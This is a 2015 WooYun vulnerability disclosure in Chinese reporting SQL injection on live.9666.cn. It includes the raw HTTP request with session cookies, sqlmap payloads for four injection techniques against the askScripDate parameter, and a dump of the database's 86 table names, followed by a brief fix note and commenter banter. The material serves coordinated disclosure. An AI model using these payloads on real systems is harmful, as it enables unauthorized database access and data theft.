当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143438

漏洞标题:牛仔网某分站SQL注射(可union)

相关厂商:牛仔网

漏洞作者: missy

提交时间:2015-09-25 17:40

修复时间:2015-11-09 19:50

公开时间:2015-11-09 19:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

详细说明:

GET /scrip/findMyScrips.action?roomsInfo=&askScripDate=2015-07-20'' HTTP/1.1
Host: live.9666.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://live.9666.cn/scrip/myScrips?toolbar
Cookie: cowboy_website=c226bc22-af26-4e88-a886-80d132782618; musicStatus=on; __utma=236883550.934637685.1443167390.1443167390.1443167390.1; __utmb=236883550.11.10.1443167390; __utmc=236883550; __utmz=236883550.1443167390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; cowboy_temp=""; cowboy_login=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_user_name=asdfg; cowboy_login_imply=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_nick_name=61736466675f34354c4f4e43; cowboy_latest_login_time=1443168569; haoshengyin=1; JSESSIONID=D80ECF2572888245CD6E573022B67F0D
Connection: keep-alive


参数:askScripDate


1.jpg


2.jpg


3.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: askScripDate (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: roomsInfo=&askScripDate=-5945' OR 6307=6307#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: roomsInfo=&askScripDate=-4368' OR 1 GROUP BY CONCAT(0x7162787a71,(SELECT (CASE WHEN (1877=1877) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: roomsInfo=&askScripDate=2015-07-20''' OR SLEEP(5)#
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: roomsInfo=&askScripDate=2015-07-20''' UNION ALL SELECT CONCAT(0x7162787a71,0x6e4c4e70697444767670,0x71626a7171)#
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: live
[86 tables]
+-------------------------------------------+
| t_liv_ad_convertion_percent               |
| t_liv_ad_record                           |
| t_liv_admin_statistics                    |
| t_liv_apply                               |
| t_liv_bulletin                            |
| t_liv_buy_vip_detail                      |
| t_liv_certificate                         |
| t_liv_certificate_account                 |
| t_liv_chat                                |
| t_liv_chat_examination_permission         |
| t_liv_chat_examination_recording          |
| t_liv_check_in                            |
| t_liv_common_view                         |
| t_liv_common_view_order                   |
| t_liv_data_bank                           |
| t_liv_data_bank_active                    |
| t_liv_data_bank_addition                  |
| t_liv_data_bank_addition_audit_record     |
| t_liv_data_bank_audit_history             |
| t_liv_data_bank_category                  |
| t_liv_data_bank_leavemessage              |
| t_liv_data_bank_leavemessage_count        |
| t_liv_data_bank_master                    |
| t_liv_data_bank_question                  |
| t_liv_data_bank_replymessage              |
| t_liv_data_bank_replymessage_audit_record |
| t_liv_data_bank_user_see                  |
| t_liv_data_detail                         |
| t_liv_data_detail_log                     |
| t_liv_date_bank_remark                    |
| t_liv_forbid                              |
| t_liv_gift                                |
| t_liv_ip_statistics                       |
| t_liv_liver_advertisement                 |
| t_liv_liver_advertisement_ectype          |
| t_liv_liver_introduce                     |
| t_liv_liver_introduce_ectype              |
| t_liv_message                             |
| t_liv_message_notice                      |
| t_liv_message_recommend                   |
| t_liv_mobile_feedback                     |
| t_liv_notice                              |
| t_liv_privilege                           |
| t_liv_recommend_column                    |
| t_liv_recommend_liver                     |
| t_liv_recommend_message                   |
| t_liv_recommend_script                    |
| t_liv_record                              |
| t_liv_relevance_website                   |
| t_liv_room                                |
| t_liv_room_certificate                    |
| t_liv_room_property                       |
| t_liv_room_relevance                      |
| t_liv_score_detail                        |
| t_liv_scrip_answer                        |
| t_liv_scrip_ask                           |
| t_liv_scrip_ask_first_record              |
| t_liv_scrip_recommend                     |
| t_liv_statistic_chat_scrip_total          |
| t_liv_statistic_chat_scrip_total_rank     |
| t_liv_statistic_chat_total                |
| t_liv_statistic_chat_user_room            |
| t_liv_statistic_chat_user_room_rank       |
| t_liv_statistic_room_available            |
| t_liv_statistic_scrip_total               |
| t_liv_statistic_scrip_user_room           |
| t_liv_statistic_scrip_user_room_rank      |
| t_liv_statistics                          |
| t_liv_support_num                         |
| t_liv_tag                                 |
| t_liv_tag_chat                            |
| t_liv_tag_message                         |
| t_liv_tag_view                            |
| t_liv_title                               |
| t_liv_title_level                         |
| t_liv_training_camp                       |
| t_liv_user                                |
| t_liv_view                                |
| t_liv_vipinfo                             |
| t_liv_vote_detail                         |
| t_live_room_property_log                  |
| t_live_statics_month                      |
| t_live_weibo_account                      |
| v_hall_record                             |
| v_hall_record_hits                        |
| v_hall_room                               |
+-------------------------------------------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-25 19:48

厂商回复:

感谢提交

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-25 17:41 | Martial ( 普通白帽子 | Rank:1420 漏洞数:218 )

    目测20rank

  2. 2015-09-25 19:21 | 牛 小 帅 ( 普通白帽子 | Rank:483 漏洞数:117 | 茶凉了,就不要再续了,再续也不是原来的味...)

    哈哈,从首页下来了

  3. 2015-09-28 09:46 | missy ( 普通白帽子 | Rank:699 漏洞数:196 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

    @牛 小 帅 为什么上了首页又下来了?你看到上首页了?

  4. 2015-09-28 09:56 | 牛 小 帅 ( 普通白帽子 | Rank:483 漏洞数:117 | 茶凉了,就不要再续了,再续也不是原来的味...)

    @missy 表示看到了 17:40-42分都是首页嘎嘎

  5. 2015-09-28 10:22 | missy ( 普通白帽子 | Rank:699 漏洞数:196 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

    @牛 小 帅 多谢大牛了。 @xsser @疯狗 狗哥麻烦看看这个走了首页,然后小厂商了怎么回事?

  6. 2015-09-28 15:16 | Submit ( 普通白帽子 | Rank:464 漏洞数:104 | 卖WB 1:10)

    那个不叫首页, 那个是漏洞列表。 首页是index

  7. 2015-09-28 15:23 | 牛 小 帅 ( 普通白帽子 | Rank:483 漏洞数:117 | 茶凉了,就不要再续了,再续也不是原来的味...)

    @Submit 拉到吧 首页我还分不清吗 还有中午的芒果分站一个注入 ,你看看首页呆了多久,结果下午就下了首页 =====最新提交就是首页

  8. 2015-09-28 16:03 | missy ( 普通白帽子 | Rank:699 漏洞数:196 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

    @牛 小 帅 多谢大牛澄清事实,为你的白帽子精神+1.

  9. 2015-09-28 16:10 | 牛 小 帅 ( 普通白帽子 | Rank:483 漏洞数:117 | 茶凉了,就不要再续了,再续也不是原来的味...)

    @missy 喊我小牛 嘻嘻 小牛这个称呼我喜欢o(∩_∩)o 不过呢 不要计较 , 一个首页又不能娶媳妇儿 没啥的